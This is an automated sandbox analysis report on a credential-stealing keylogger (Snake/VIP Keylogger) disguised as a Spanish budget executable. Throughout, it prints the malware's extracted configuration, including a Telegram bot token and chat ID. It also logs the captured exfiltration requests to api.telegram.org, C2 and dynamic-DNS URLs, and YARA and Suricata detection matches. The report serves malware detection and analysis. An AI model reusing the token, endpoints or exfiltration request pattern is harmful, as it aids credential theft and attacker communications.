Windows Analysis Report
PRESUPUESTO DE NOVIEMBRE...exe

AV Detection

Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat_id": "8178506397", "Version": "4.4"}
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat id": "8178506397", "Version": "4.4"}
Source: PRESUPUESTO DE NOVIEMBRE...exe.7336.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendMessage"}

Source: PRESUPUESTO DE NOVIEMBRE...exe

ReversingLabs: Detection: 44%

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: PRESUPUESTO DE NOVIEMBRE...exe

Joe Sandbox ML: detected

Location Tracking

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49774 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49877 version: TLS 1.2

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: agpG.pdb source: PRESUPUESTO DE NOVIEMBRE...exe
Source:	Binary string: agpG.pdbSHA256 source: PRESUPUESTO DE NOVIEMBRE...exe

Software Vulnerabilities

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0781EABFh		2_2_0781EBF7
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0300F45Dh		5_2_0300F2C0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0300F45Dh		5_2_0300F4AC
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0300FC19h		5_2_0300F970
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C131E0h		5_2_05C12DC2
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C131E0h		5_2_05C12DC8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1D7F9h		5_2_05C1D550
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1CF49h		5_2_05C1CCA0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1F209h		5_2_05C1EF60
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1E959h		5_2_05C1E6B0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1E0A9h		5_2_05C1DE00
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1DC51h		5_2_05C1D9A8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C12C19h		5_2_05C12968
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C131E0h		5_2_05C1310E
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1D3A1h		5_2_05C1D0F8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		5_2_05C10040
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1FAB9h		5_2_05C1F810
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1F661h		5_2_05C1F3B8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1EDB1h		5_2_05C1EB08
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C10D0Dh		5_2_05C10B30
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C11697h		5_2_05C10B30
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1E501h		5_2_05C1E258

Networking

Source: unknown

DNS query: name: api.telegram.org

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54Host: api.telegram.orgContent-Length: 578

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49786 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49708 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49780 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49774 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54Host: api.telegram.orgContent-Length: 578

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 31 Oct 2024 09:35:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PRESUPUESTO DE NOVIEMBRE...exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB_q
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000319A000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77$
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB_q

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49877 version: TLS 1.2

System Summary

Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
